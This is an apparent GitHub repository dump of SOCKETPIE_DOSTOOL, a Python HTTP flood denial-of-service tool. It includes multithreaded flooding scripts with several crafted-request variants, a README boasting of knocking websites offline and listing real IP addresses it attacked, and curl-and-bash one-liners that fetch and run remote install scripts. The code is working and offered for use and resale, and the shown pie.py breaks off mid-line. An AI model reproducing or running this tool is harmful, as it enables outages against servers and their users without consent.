├── FLOOD_MESSAGE.png ├── FOLDER_UPDATE ├── UPDATE-3_14_2023_PIE.py └── UPDATE-3_24_2023_PIE.py ├── INPUT_ALL.png ├── README.md ├── login.txt ├── pie.py ├── proof.mp4 └── target.txt /FLOOD_MESSAGE.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Hex1629/SOCKETPIE_DOSTOOL/025c4a7f956a6a87d5f479b0de550a3e5b3a167d/FLOOD_MESSAGE.png -------------------------------------------------------------------------------- /FOLDER_UPDATE/UPDATE-3_14_2023_PIE.py: -------------------------------------------------------------------------------- 1 | # CHECK IMPORT 2 | try: 3 | import socket 4 | import threading 5 | import string 6 | import random 7 | import time 8 | import os 9 | import platform 10 | import sys 11 | from colorama import Fore 12 | except ModuleNotFoundError as e: 13 | print(f"{e} CAN'T IMPORT . . . .") 14 | exit() 15 | 16 | # DEF & CLASS 17 | 18 | def clear_text(): 19 | if platform.system().upper() == "WINDOWS": 20 | os.system('cls') 21 | else: 22 | os.system('clear') 23 | 24 | def status_print(ip,port,thread_id,rps,path_get): 25 | print(f"{Fore.YELLOW}FLOODING {Fore.LIGHTYELLOW_EX}HTTP {Fore.WHITE}---> {Fore.BLUE}TARGET{Fore.WHITE}={ip}:{port} {Fore.LIGHTBLUE_EX}PATH{Fore.WHITE}={path_get} {Fore.CYAN}RPS{Fore.WHITE}={rps} {Fore.LIGHTCYAN_EX}ID{Fore.WHITE}={thread_id}{Fore.RESET}") 26 | def generate_url_path_pyflooder(num): 27 | msg = str(string.ascii_letters + string.digits + string.punctuation) 28 | data = "".join(random.sample(msg, int(num))) 29 | return data 30 | 31 | def generate_url_path_choice(num): 32 | letter = '''abcdefghijklmnopqrstuvwxyzABCDELFGHIJKLMNOPQRSTUVWXYZ0123456789!"#$%&'()*+,-./:;?@[\]^_`{|}~''' 33 | data = "" 34 | for _ in range(int(num)): 35 | data += random.choice(letter) 36 | return data 37 | 38 | # DOS 39 | def DoS_Attack(ip,host,port,type_attack,id,booter_sent): 40 | rps = 0 41 | url_path = '' 42 | path_get = ['PY_FLOOD','CHOICES_FLOOD'] 43 | path_get_loader = random.choice((path_get)) 44 | if path_get_loader == "PY_FLOOD": 45 | url_path = generate_url_path_pyflooder(5) 46 | else: 47 | url_path = generate_url_path_choice(5) 48 | s = socket.socket(socket.AF_INET,socket.SOCK_STREAM) 49 | try: 50 | packet_data = f"{type_attack} /{url_path} HTTP/1.1\nHost: {host}\n\n".encode() 51 | s.connect((ip,port)) 52 | for _ in range(booter_sent): 53 | s.sendall(packet_data) 54 | s.send(packet_data) 55 | rps += 2 56 | except: 57 | try: 58 | s.shutdown(socket.SHUT_RDWR) 59 | s.close() 60 | except: 61 | pass 62 | status_print(ip,port,id,rps,path_get_loader) 63 | 64 | status_code = False 65 | id_loader = 0 66 | def runing_attack(ip,host,port_loader,time_loader,spam_loader,methods_loader,booter_sent): 67 | global status_code,id_loader 68 | if status_code == True: 69 | while time.time() < time_loader: 70 | for _ in range(spam_loader): 71 | id_loader += 1 72 | th = threading.Thread(target=DoS_Attack,args=(ip,host,port_loader,methods_loader,id_loader,booter_sent)) 73 | th.start() 74 | th = threading.Thread(target=DoS_Attack,args=(ip,host,port_loader,methods_loader,id_loader,booter_sent)) 75 | th.start() 76 | th = threading.Thread(target=DoS_Attack,args=(ip,host,port_loader,methods_loader,id_loader,booter_sent)) 77 | th.start() 78 | th = threading.Thread(target=DoS_Attack,args=(ip,host,port_loader,methods_loader,id_loader,booter_sent)) 79 | th.start() 80 | th = threading.Thread(target=DoS_Attack,args=(ip,host,port_loader,methods_loader,id_loader,booter_sent)) 81 | th.start() 82 | else: 83 | threading.Thread(target=runing_attack,args=(ip,host,port_loader,time_loader,spam_loader,methods_loader,booter_sent)).start() 84 | 85 | #DATA 86 | banner = f""" 87 | {Fore.YELLOW} __..---..__ 88 | {Fore.YELLOW} ,-=' {Fore.RED}/ | \ {Fore.YELLOW}`=-. 89 | {Fore.WHITE}:--..___________..--; 90 | {Fore.WHITE} \.,_____________,./ 91 | 92 | {Fore.RED}╔═╗╔═╗╔═╗╦╔═╔═╗╔╦╗┌─┐┬┌─┐ 93 | {Fore.LIGHTRED_EX}╚═╗║ ║║ ╠╩╗║╣ ║ ├─┘│├┤ 94 | {Fore.WHITE}╚═╝╚═╝╚═╝╩ ╩╚═╝ ╩o┴ ┴└─┘ {Fore.YELLOW}# (OFFLINE) {Fore.LIGHTYELLOW_EX}TOOL #{Fore.RESET}""" 95 | 96 | print(banner) 97 | host = "" 98 | ip = "" 99 | target_loader = input(f"{Fore.LIGHTYELLOW_EX}IP/URL>") 100 | port_loader = int(input(f"{Fore.YELLOW}PORT>")) 101 | time_loader = time.time() + int(input(f"{Fore.LIGHTRED_EX}TIME (DEFAULT=250)>")) 102 | spam_loader = int(input(f"{Fore.RED}SPAM THREAD (DEFAULT=50 OR 299)>")) 103 | create_thread = int(input(F"{Fore.LIGHTGREEN_EX}CREATE THREAD (DEFAULT=50)>")) 104 | booter_sent = int(input(F"{Fore.GREEN}BOOTER SENT (DEFAULT=500)>")) 105 | print(f"{Fore.LIGHTCYAN_EX} EXAMPLE HTTP METHODS> CONNECT GET PUT PATCH POST HEAD DELETE OPTIONS TRACE") 106 | print(f"{Fore.CYAN}EXAMPLE CUSTOM HTTP METHODS> PANOS MIRAI EXPLOIT LOGSHELL SERVER CLOUDFLARE AGE PYFLOODER GATEWAY") 107 | methods_loader = input(F"{Fore.LIGHTBLUE_EX}HTTP_METHODS (EXAMPLE=GATEWAY)>") 108 | print(f"{Fore.MAGENTA}TRYING TO GET IP:PORT {Fore.LIGHTMAGENTA_EX}. . .{Fore.RESET}") 109 | try: 110 | host = str(target_loader).replace("https://", "").replace("http://", "").replace("www.", "").replace("/", "") 111 | ip = socket.gethostbyname(host) 112 | except socket.gaierror: 113 | exit() 114 | for loader_num in range(create_thread): 115 | sys.stdout.write(f"\r {Fore.YELLOW}{loader_num} CREATE THREAD . . .{Fore.RESET}") 116 | sys.stdout.flush() 117 | threading.Thread(target=runing_attack,args=(ip,host,port_loader,time_loader,spam_loader,methods_loader,booter_sent)).start() 118 | threading.Thread(target=runing_attack,args=(ip,host,port_loader,time_loader,spam_loader,methods_loader,booter_sent)).start() 119 | threading.Thread(target=runing_attack,args=(ip,host,port_loader,time_loader,spam_loader,methods_loader,booter_sent)).start() 120 | threading.Thread(target=runing_attack,args=(ip,host,port_loader,time_loader,spam_loader,methods_loader,booter_sent)).start() 121 | threading.Thread(target=runing_attack,args=(ip,host,port_loader,time_loader,spam_loader,methods_loader,booter_sent)).start() 122 | clear_text() 123 | print(banner) 124 | status_code = True 125 | print(f"{Fore.GREEN}TRYING SENT . . .{Fore.RESET}") 126 | -------------------------------------------------------------------------------- /FOLDER_UPDATE/UPDATE-3_24_2023_PIE.py: -------------------------------------------------------------------------------- 1 | # CHECK IMPORT 2 | try: 3 | import socket 4 | import threading 5 | import string 6 | import random 7 | import time 8 | import os 9 | import platform 10 | import sys 11 | from colorama import Fore 12 | except ModuleNotFoundError as e: 13 | print(f"{e} CAN'T IMPORT . . . .") 14 | exit() 15 | 16 | # DEF & CLASS 17 | 18 | def clear_text(): 19 | if platform.system().upper() == "WINDOWS": 20 | os.system('cls') 21 | else: 22 | os.system('clear') 23 | 24 | def status_print(ip,port,thread_id,rps,path_get): 25 | print(f"{Fore.YELLOW}FLOODING {Fore.LIGHTYELLOW_EX}HTTP{Fore.WHITE} {Fore.WHITE}---> {Fore.BLUE}TARGET{Fore.WHITE}={ip}:{port} {Fore.LIGHTBLUE_EX}PATH{Fore.WHITE}={path_get} {Fore.CYAN}RPS{Fore.WHITE}={rps} {Fore.LIGHTCYAN_EX}ID{Fore.WHITE}={thread_id}{Fore.RESET}") 26 | def generate_url_path_pyflooder(num): 27 | msg = str(string.ascii_letters + string.digits + string.punctuation) 28 | data = "".join(random.sample(msg, int(num))) 29 | return data 30 | 31 | def generate_url_path_choice(num): 32 | letter = '''abcdefghijklmnopqrstuvwxyzABCDELFGHIJKLMNOPQRSTUVWXYZ0123456789!"#$%&'()*+,-./:;?@[\]^_`{|}~''' 33 | data = "" 34 | for _ in range(int(num)): 35 | data += random.choice(letter) 36 | return data 37 | 38 | # DOS 39 | def DoS_Attack(ip,host,port,type_attack,id,booter_sent,data_type_loader_packet): 40 | rps = 0 41 | url_path = '' 42 | path_get = ['PY_FLOOD','CHOICES_FLOOD'] 43 | path_get_loader = random.choice((path_get)) 44 | if path_get_loader == "PY_FLOOD": 45 | url_path = generate_url_path_pyflooder(5) 46 | else: 47 | url_path = generate_url_path_choice(5) 48 | s = socket.socket(socket.AF_INET,socket.SOCK_STREAM) 49 | try: 50 | if data_type_loader_packet == 'PY' or data_type_loader_packet == 'PYF': 51 | packet_data = f"{type_attack} /{url_path} HTTP/1.1\nHost: {host}\n\n".encode() 52 | elif data_type_loader_packet == 'OWN1': 53 | packet_data = f"{type_attack} /{url_path} HTTP/1.1\nHost: {host}\n\n\r\r".encode() 54 | elif data_type_loader_packet == 'OWN2': 55 | packet_data = f"{type_attack} /{url_path} HTTP/1.1\nHost: {host}\r\r\n\n".encode() 56 | elif data_type_loader_packet == 'OWN3': 57 | packet_data = f"{type_attack} /{url_path} HTTP/1.1\nHost: {host}\n\r\n".encode() 58 | elif data_type_loader_packet == 'OWN4': 59 | packet_data = f"{type_attack} /{url_path} HTTP/1.1\nHost: {host}\n\n\n\n".encode() 60 | elif data_type_loader_packet == 'OWN5': 61 | packet_data = f"{type_attack} /{url_path} HTTP/1.1\nHost: {host}\n\n\n\n\r\r\r\r".encode() 62 | s.connect((ip,port)) 63 | for _ in range(booter_sent): 64 | s.sendall(packet_data) 65 | s.send(packet_data) 66 | rps += 2 67 | except: 68 | try: 69 | s.shutdown(socket.SHUT_RDWR) 70 | s.close() 71 | except: 72 | pass 73 | status_print(ip,port,id,rps,path_get_loader) 74 | 75 | status_code = False 76 | id_loader = 0 77 | def runing_attack(ip,host,port_loader,time_loader,spam_loader,methods_loader,booter_sent,data_type_loader_packet): 78 | global status_code,id_loader 79 | if status_code == True: 80 | while time.time() < time_loader: 81 | for _ in range(spam_loader): 82 | id_loader += 1 83 | th = threading.Thread(target=DoS_Attack,args=(ip,host,port_loader,methods_loader,id_loader,booter_sent,data_type_loader_packet)) 84 | th.start() 85 | th = threading.Thread(target=DoS_Attack,args=(ip,host,port_loader,methods_loader,id_loader,booter_sent,data_type_loader_packet)) 86 | th.start() 87 | th = threading.Thread(target=DoS_Attack,args=(ip,host,port_loader,methods_loader,id_loader,booter_sent,data_type_loader_packet)) 88 | th.start() 89 | th = threading.Thread(target=DoS_Attack,args=(ip,host,port_loader,methods_loader,id_loader,booter_sent,data_type_loader_packet)) 90 | th.start() 91 | th = threading.Thread(target=DoS_Attack,args=(ip,host,port_loader,methods_loader,id_loader,booter_sent,data_type_loader_packet)) 92 | th.start() 93 | else: 94 | threading.Thread(target=runing_attack,args=(ip,host,port_loader,time_loader,spam_loader,methods_loader,booter_sent,data_type_loader_packet)).start() 95 | 96 | #DATA 97 | banner = f""" 98 | {Fore.YELLOW} __..---..__ 99 | {Fore.YELLOW} ,-=' {Fore.RED}/ | \ {Fore.YELLOW}`=-. 100 | {Fore.WHITE}:--..___________..--; 101 | {Fore.WHITE} \.,_____________,./ 102 | 103 | {Fore.RED}╔═╗╔═╗╔═╗╦╔═╔═╗╔╦╗┌─┐┬┌─┐ 104 | {Fore.LIGHTRED_EX}╚═╗║ ║║ ╠╩╗║╣ ║ ├─┘│├┤ 105 | {Fore.WHITE}╚═╝╚═╝╚═╝╩ ╩╚═╝ ╩o┴ ┴└─┘ {Fore.YELLOW}# (OFFLINE) {Fore.LIGHTYELLOW_EX}TOOL v2 #{Fore.RESET}""" 106 | 107 | print(banner) 108 | host = "" 109 | ip = "" 110 | print(f"{Fore.LIGHTWHITE_EX}PYF OWN1-5") 111 | data_type_loader_packet = input(F"{Fore.WHITE}TYPE PACKET (DEFAULT=PYF EXAMPLE=OWN1)>").upper() 112 | target_loader = input(f"{Fore.LIGHTYELLOW_EX}IP/URL>") 113 | port_loader = int(input(f"{Fore.YELLOW}PORT>")) 114 | time_loader = time.time() + int(input(f"{Fore.LIGHTRED_EX}TIME (DEFAULT=250)>")) 115 | spam_loader = int(input(f"{Fore.RED}SPAM THREAD (DEFAULT=50 EXAMPLE=299)>")) 116 | create_thread = int(input(F"{Fore.LIGHTGREEN_EX}CREATE THREAD (DEFAULT=50)>")) 117 | booter_sent = int(input(F"{Fore.GREEN}BOOTER SENT (DEFAULT=500 EXAMPLE=65536)>")) 118 | print(f"{Fore.LIGHTCYAN_EX} EXAMPLE HTTP METHODS> CONNECT GET PUT PATCH POST HEAD DELETE OPTIONS TRACE") 119 | print(f"{Fore.CYAN}EXAMPLE CUSTOM HTTP METHODS> PANOS MIRAI EXPLOIT LOGSHELL SERVER CLOUDFLARE AGE PYFLOODER GATEWAY") 120 | methods_loader = input(F"{Fore.LIGHTBLUE_EX}HTTP_METHODS (EXAMPLE=GATEWAY)>").upper() 121 | spam_create_thread = int(input(F"{Fore.LIGHTBLACK_EX}SPAM CREATE THREAD (DEFAULT=5 EXAMPLE=15)>")) 122 | print(f"{Fore.MAGENTA}TRYING TO GET IP:PORT {Fore.LIGHTMAGENTA_EX}. . .{Fore.RESET}") 123 | try: 124 | host = str(target_loader).replace("https://", "").replace("http://", "").replace("www.", "").replace("/", "") 125 | ip = socket.gethostbyname(host) 126 | except socket.gaierror: 127 | exit() 128 | for loader_num in range(create_thread): 129 | sys.stdout.write(f"\r {Fore.YELLOW}{loader_num} CREATE THREAD . . .{Fore.RESET}") 130 | sys.stdout.flush() 131 | 132 | for _ in range(spam_create_thread): 133 | threading.Thread(target=runing_attack,args=(ip,host,port_loader,time_loader,spam_loader,methods_loader,booter_sent,data_type_loader_packet)).start() 134 | clear_text() 135 | print(banner) 136 | status_code = True 137 | print(f"{Fore.GREEN}TRYING SENT . . .{Fore.RESET}") 138 | -------------------------------------------------------------------------------- /INPUT_ALL.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Hex1629/SOCKETPIE_DOSTOOL/025c4a7f956a6a87d5f479b0de550a3e5b3a167d/INPUT_ALL.png -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # SOCKETPIE_DOSTOOL 🌌 2 | 3 | 🛠️ DOS TOOL WITH PYTHON LAYER7 :) (HTTP FLOOD🌊) 4 | 5 | ⚙️ TECHNIQUES FLOOD (TCP FLOOD ATTACK🌊) 6 | 7 | 💥 DOWN HTTP WEBSITE TAKE ⏳6-29 SECS🌊 (SOME WEBSITE) 8 | 9 | ⚙️ (⏳DOWN HTTP SMALL SERVER💥) ⚙️ 10 | 11 | 🛠️⚙️ I MADE HTTPS FLOOD NOW🌊 12 | 13 | # INSTALL 14 | 15 | **REPLIT** 16 | ``` 17 | curl -O https://raw.githubusercontent.com/Hex1629/INSTALL_MYPROJECT/main/INSTALL_SCRIPT/socketpie.replit && bash socketpie.replit 18 | ``` 19 | 20 | **LINUX** 21 | ``` 22 | curl -O https://raw.githubusercontent.com/Hex1629/INSTALL_MYPROJECT/main/INSTALL_SCRIPT/socketpie.linux && bash socketpie.linux 23 | ``` 24 | 25 | **WINDOWS** 26 | ``` 27 | cd Downloads && cd SOCKETPIE_DOSTOOL-main && pip install requests && pip install colorama && python pie.py 28 | ``` 29 | 30 | # UPDATE  ⏳ 31 | 32 | IF YOU WANNA USE OLD CODE PIE PLS GO TO THIS 📁FOLDER --> FOLDER_UPDATE⚙️ 33 | 34 | (UPDATE-3_24_2023_PIE.py) <--- OLD PIE TOOL🌊 35 | 36 | # HIT DSTAT LAYER7🚀 37 |  📌 100K RPS IN VEDBEX DSTAT 📈(51.159.30.249)📈 38 | 39 | 📌 17K RPS IN DSTATSEC.GITHUB.IO DSTAT 📈(109.71.9.87)💥 40 | 41 | 📌 1.5M RPS IN DSTAT.GITHUB.IO 📈(51.15.25.108)💥 42 | 43 | 📌 3M RPS IN DSTAT.XYZ 📈(Worldstream-1 - 185.132.134.228)📈 44 | 45 | 💣 ATTACK SERVER ⏳(167.71.202.248)💥 46 | 47 | 💣 ATTACK NETDATA DASHBOARD ⏳(45.32.80.25)💥 48 | 49 | 💣 ATTACK SERVER ⏳(104.253.87.11)💥 50 | 51 |

🌊 GUI SOCKET.PIE🥧 DOS TOOL 🌊

52 | 53 | ![Screenshot 2023-03-26 044624](https://user-images.githubusercontent.com/93824226/227744364-7cf31be2-bec5-4d62-97dd-c24ce6481455.png) 54 | 55 | ![Screenshot 2023-03-25 173955](https://user-images.githubusercontent.com/93824226/227744383-3436cc44-06f2-4ef9-87cf-4e5a7e4065b5.png) 56 | 57 | 58 | 59 | 60 | 61 |

🌊 PROOF🎬 🌊

62 | 63 | https://user-images.githubusercontent.com/93824226/224772072-c9f767c6-e265-42dd-951a-d7238d449b1d.mp4 64 | 65 | https://user-images.githubusercontent.com/93824226/224707531-13c89059-9537-4ac5-87a6-40f3e1508a3d.mp4 66 | 67 | https://user-images.githubusercontent.com/93824226/224642391-d1f90a2d-4730-4bbb-939e-5231ba658fe2.mp4 68 | 69 | 70 | # MAKE BY Hex1629 (👤🛠️) 71 | 💸 YOU CAN RESELL BUT YOU NEED TO WRITE CREDIT ME. 72 | 73 | 🛠️📁 IF YOU MAKE NEW VERSIONS WRITE CREDIT YOU TOO. 74 | 75 | 📌 DON'T FORGOT ! ! ! 76 | 77 | # FAQ 78 | 79 | Why i cant login ? 80 | 81 | Just only type ROOT and press enter 82 | 83 | 84 | It working for cloudflare ? 85 | 86 | No it's not https flooding 87 | 88 | -------------------------------------------------------------------------------- /login.txt: -------------------------------------------------------------------------------- 1 | ROOT@SOCKET.PIE 2 | ADMIN@SOCKET.PIE 3 | ROOT@ROOT 4 | ADMIN@ADMIN 5 | USER@127.0.0.1 6 | KALI@KALI 7 | HEX1628@DEV 8 | -------------------------------------------------------------------------------- /pie.py: -------------------------------------------------------------------------------- 1 | # CHECK IMPORT 2 | try: 3 | import socket 4 | import threading 5 | import string 6 | import random 7 | import time 8 | import os 9 | import platform 10 | import sys 11 | import requests 12 | from colorama import Fore 13 | except ModuleNotFoundError as e: 14 | print(f"{e} CAN'T IMPORT . . . . ") 15 | exit() 16 | 17 | GUI_SETUP = 0 18 | 19 | # DEF & CLASS 20 | 21 | username = '' 22 | password = '' 23 | 24 | def login_checker(username,password): 25 | file_path = os.path.join(os.path.dirname(__file__), 'login.txt') 26 | try: 27 | with open(file_path) as f: 28 | credentials = [x.strip() for x in f.readlines() if x.strip()] 29 | for x in credentials: 30 | c_username, c_password = x.split('@') 31 | if c_username.upper() == username.upper() and c_password.upper() == password.upper(): 32 | return True 33 | except FileNotFoundError: 34 | return 'UNKNOWN ERROR ARE RETURNING BY FILESNOTFOUND' 35 | 36 | def clear_text(): 37 | if platform.system().upper() == "WINDOWS": 38 | os.system('cls') 39 | else: 40 | os.system('clear') 41 | 42 | def generate_url_path_pyflooder(num): 43 | msg = str(string.ascii_letters + string.digits + string.punctuation) 44 | data = "".join(random.sample(msg, int(num))) 45 | return data 46 | 47 | def generate_url_path_choice(num): 48 | letter = '''abcdefghijklmnopqrstuvwxyzABCDELFGHIJKLMNOPQRSTUVWXYZ0123456789!"#$%&'()*+,-./:;?@[\]^_`{|}~''' 49 | data = "" 50 | for _ in range(int(num)): 51 | data += random.choice(letter) 52 | return data 53 | 54 | # DOS 55 | def DoS_Attack(ip,host,port,type_attack,booter_sent,data_type_loader_packet): 56 | url_path = '' 57 | path_get = ['PY_FLOOD','CHOICES_FLOOD'] 58 | path_get_loader = random.choice((path_get)) 59 | if path_get_loader == "PY_FLOOD": 60 | url_path = generate_url_path_pyflooder(5) 61 | else: 62 | url_path = generate_url_path_choice(5) 63 | s = socket.socket(socket.AF_INET,socket.SOCK_STREAM) 64 | try: 65 | if data_type_loader_packet == 'PY' or data_type_loader_packet == 'PYF': 66 | packet_data = f"{type_attack} /{url_path} HTTP/1.1\nHost: {host}\n\n".encode() 67 | elif data_type_loader_packet == 'OWN1': 68 | packet_data = f"{type_attack} /{url_path} HTTP/1.1\nHost: {host}\n\n\r\r".encode() 69 | elif data_type_loader_packet == 'OWN2': 70 | packet_data = f"{type_attack} /{url_path} HTTP/1.1\nHost: {host}\r\r\n\n".encode() 71 | elif data_type_loader_packet == 'OWN3': 72 | packet_data = f"{type_attack} /{url_path} HTTP/1.1\nHost: {host}\n\r\n".encode() 73 | elif data_type_loader_packet == 'OWN4': 74 | packet_data = f"{type_attack} /{url_path} HTTP/1.1\nHost: {host}\n\n\n\n".encode() 75 | elif data_type_loader_packet == 'OWN5': 76 | packet_data = f"{type_attack} /{url_path} HTTP/1.1\nHost: {host}\n\n\n\n\r\r\r\r".encode() 77 | elif data_type_loader_packet == 'OWN6': 78 | packet_data = f"{type_attack} /{url_path} HTTP/1.1\nHost: {host}\n\r\n\r\n".encode() 79 | elif data_type_loader_packet == 'OWN7': 80 | packet_data = f"{type_attack} /{url_path} HTTP/1.1\nHost: {host}\n\r\n\r".encode() 81 | elif data_type_loader_packet == 'OWN8': 82 | packet_data = f"{type_attack} /{url_path} HTTP/1.1\nHost: {host}\n\b\n\b\n\r\n\r".encode() 83 | elif data_type_loader_packet == 'TEST': 84 | packet_data = f"{type_attack} /{url_path} HTTP/1.1\nHost: {host}\n\b\n\b\n\r\n\r\n\n".encode() 85 | elif data_type_loader_packet == 'TEST2': 86 | packet_data = f"{type_attack} /{url_path} HTTP/1.1\nHost: {host}\n\b\n\b\n\n\r\r\n\r\n\n\n".encode() 87 | elif data_type_loader_packet == 'TEST3': 88 | packet_data = f"{type_attack} /{url_path} HTTP/1.1\nHost: {host}\n\b\n\b\n\a\n\r\n\n".encode() 89 | elif data_type_loader_packet == 'TEST4': 90 | packet_data = f"{type_attack} /{url_path} HTTP/1.1\nHost: {host}\n\b\n\b\n\a\n\a\n\n\r\r".encode() 91 | elif data_type_loader_packet == 'TEST5': 92 | packet_data = f"{type_attack} /{url_path} HTTP/1.1\nHost: {host}\n\b\n\t\n\n\r\r".encode() 93 | s.connect((ip,port)) 94 | for _ in range(booter_sent): 95 | s.sendall(packet_data) 96 | s.send(packet_data) 97 | except: 98 | try: 99 | s.shutdown(socket.SHUT_RDWR) 100 | s.close() 101 | except: 102 | pass 103 | 104 | status_code = False 105 | def runing_attack(ip,host,port_loader,time_loader,spam_loader,methods_loader,booter_sent,data_type_loader_packet): 106 | global status_code 107 | if status_code == True: 108 | while time.time() < time_loader: 109 | for _ in range(spam_loader): 110 | th = threading.Thread(target=DoS_Attack,args=(ip,host,port_loader,methods_loader,booter_sent,data_type_loader_packet)) 111 | th.start() 112 | th = threading.Thread(target=DoS_Attack,args=(ip,host,port_loader,methods_loader,booter_sent,data_type_loader_packet)) 113 | th.start() 114 | th = threading.Thread(target=DoS_Attack,args=(ip,host,port_loader,methods_loader,booter_sent,data_type_loader_packet)) 115 | th.start() 116 | th = threading.Thread(target=DoS_Attack,args=(ip,host,port_loader,methods_loader,booter_sent,data_type_loader_packet)) 117 | th.start() 118 | th = threading.Thread(target=DoS_Attack,args=(ip,host,port_loader,methods_loader,booter_sent,data_type_loader_packet)) 119 | th.start() 120 | else: 121 | threading.Thread(target=runing_attack,args=(ip,host,port_loader,time_loader,spam_loader,methods_loader,booter_sent,data_type_loader_packet)).start() 122 | prefix_get = "!" 123 | status_help_type = 0 124 | def command(): 125 | global status_help_type,status_code,prefix_get,username,password,GUI_SETUP 126 | if status_help_type == 0: 127 | print(f"{Fore.LIGHTYELLOW_EX} __..---..__\n{Fore.YELLOW} ,-=' {Fore.RED}/ | \{Fore.YELLOW} `=-.\n{Fore.LIGHTWHITE_EX} :--..___________..--;\n{Fore.WHITE} \.,_____________,./ \n{Fore.RED} ╔═╗╔═╗╔═╗╦╔═╔═╗╔╦╗┌─┐┬┌─┐\n{Fore.LIGHTRED_EX} ╚═╗║ ║║ ╠╩╗║╣ ║ ├─┘│├┤ \n{Fore.WHITE} ╚═╝╚═╝╚═╝╩ ╩╚═╝ ╩o┴ ┴└─┘\n {Fore.WHITE}[{Fore.GREEN}+{Fore.WHITE}] {Fore.WHITE}< {Fore.LIGHTGREEN_EX}TYPE {prefix_get}HELP FOR SHOW COMMAND {Fore.WHITE}> {Fore.RESET}") 128 | status_help_type += 1 129 | else: 130 | pass 131 | 132 | data_input_loader = input(f"{Fore.CYAN}{username}{Fore.WHITE}@{Fore.BLUE}{password} {Fore.WHITE}${Fore.RESET}") 133 | args_get = data_input_loader.split(" ") 134 | if args_get[0].upper() == f"{prefix_get}CREDIT": 135 | print(f"{Fore.YELLOW} __..---..__\n{Fore.YELLOW} ,-=' {Fore.RED}/ | \{Fore.YELLOW} `=-.\n{Fore.LIGHTWHITE_EX} :--..___________..--;\n{Fore.WHITE} \.,_____________,./ \n{Fore.LIGHTYELLOW_EX} ╔═╗╔═╗╔═╗╦╔═╔═╗╔╦╗{Fore.RED}┌─┐┬┌─┐\n{Fore.YELLOW} ╚═╗║ ║║ ╠╩╗║╣ ║{Fore.LIGHTRED_EX} ├─┘│├┤ \n{Fore.LIGHTRED_EX} ╚═╝╚═╝╚═╝╩ ╩╚═╝ ╩{Fore.WHITE}o{Fore.LIGHTYELLOW_EX}┴ ┴└─┘\n\n{Fore.LIGHTMAGENTA_EX}CREDIT {Fore.WHITE}- {Fore.LIGHTBLUE_EX}ART {Fore.WHITE}: {Fore.CYAN}Riitta Rasimus {Fore.WHITE}- {Fore.LIGHTCYAN_EX}ascii.co.uk/art/pie {Fore.WHITE}|{Fore.GREEN} DEV {Fore.WHITE}- {Fore.LIGHTGREEN_EX}github.com/Hex1629{Fore.RESET}") 136 | elif args_get[0].upper() == f"{prefix_get}HELP": 137 | print(f"{Fore.GREEN}┏━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━┳━┓\n┣━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━┻━┫\n{Fore.LIGHTGREEN_EX}┃ HELP COMMAND . menu ┃\n{Fore.GREEN}┣━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━┫\n {Fore.RED}{prefix_get}HELP {Fore.LIGHTGREEN_EX}┃ {Fore.YELLOW}For show command\n {Fore.RED}{prefix_get}CREDIT {Fore.LIGHTGREEN_EX}┃ {Fore.YELLOW}For show credit\n {Fore.RED}{prefix_get}CLS {Fore.LIGHTGREEN_EX}┃ {Fore.YELLOW}For clear all screen\n {Fore.RED}{prefix_get}MENU {Fore.LIGHTGREEN_EX}┃ {Fore.YELLOW}For return to menu\n {Fore.RED}{prefix_get}GUI_SET {Fore.LIGHTGREEN_EX}┃ {Fore.YELLOW}For change gui attack\n {Fore.RED}{prefix_get}PREFIX_SET {Fore.LIGHTGREEN_EX}┃ {Fore.YELLOW}For set prefix\n {Fore.RED}{prefix_get}FLOOD {Fore.LIGHTGREEN_EX}┃ {Fore.YELLOW}For attack target with http flood\n {Fore.RED}{prefix_get}PING_URL {Fore.LIGHTGREEN_EX}┃ {Fore.YELLOW}For ping test with url\n {Fore.RED}{prefix_get}PING_TCP {Fore.LIGHTGREEN_EX}┃ {Fore.YELLOW}For ping test with tcp\n {Fore.RED}{prefix_get}EXIT {Fore.LIGHTGREEN_EX}┃ {Fore.YELLOW}For exit from panel\n{Fore.GREEN}┗━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━┛{Fore.RESET}") 138 | elif args_get[0].upper() == f"{prefix_get}PREFIX_SET": 139 | if len(args_get) == 2: 140 | prefix_get = args_get[1] 141 | clear_text() 142 | print(f"{Fore.LIGHTYELLOW_EX} __..---..__\n{Fore.YELLOW} ,-=' {Fore.RED}/ | \{Fore.YELLOW} `=-.\n{Fore.LIGHTWHITE_EX} :--..___________..--;\n{Fore.WHITE} \.,_____________,./ \n{Fore.RED} ╔═╗╔═╗╔═╗╦╔═╔═╗╔╦╗┌─┐┬┌─┐\n{Fore.LIGHTRED_EX} ╚═╗║ ║║ ╠╩╗║╣ ║ ├─┘│├┤ \n{Fore.WHITE} ╚═╝╚═╝╚═╝╩ ╩╚═╝ ╩o┴ ┴└─┘\n {Fore.WHITE}[{Fore.GREEN}+{Fore.WHITE}] {Fore.WHITE}< {Fore.LIGHTGREEN_EX}TYPE {prefix_get}HELP FOR SHOW COMMAND {Fore.WHITE}> {Fore.RESET}") 143 | else: 144 | print(f"{Fore.YELLOW}{prefix_get}PREFIX_SET {Fore.RESET}") 145 | elif args_get[0].upper() == f"{prefix_get}GUI_SET": 146 | if len(args_get) == 2: 147 | gui_leak = args_get[1].upper() 148 | if gui_leak == "OLD": 149 | GUI_SETUP = 0 150 | elif gui_leak == "TEXT": 151 | GUI_SETUP = 1 152 | elif gui_leak == "TEXT2": 153 | GUI_SETUP = 2 154 | elif gui_leak == "TEXT3": 155 | GUI_SETUP = 3 156 | else: 157 | print(f"{Fore.RED}{prefix_get}GUI_SET {Fore.LIGHTRED_EX}{Fore.RESET}") 158 | print(f"{Fore.GREEN}MODE ---> OLD TEXT TEXT2 TEXT3{Fore.RESET}") 159 | elif args_get[0].upper() == f"{prefix_get}CLEAR" or args_get[0].upper() == f"{prefix_get}CLS": 160 | clear_text() 161 | elif args_get[0].upper() == f"{prefix_get}MENU": 162 | clear_text() 163 | print(f"{Fore.LIGHTYELLOW_EX} __..---..__\n{Fore.YELLOW} ,-=' {Fore.RED}/ | \{Fore.YELLOW} `=-.\n{Fore.LIGHTWHITE_EX} :--..___________..--;\n{Fore.WHITE} \.,_____________,./ \n{Fore.RED} 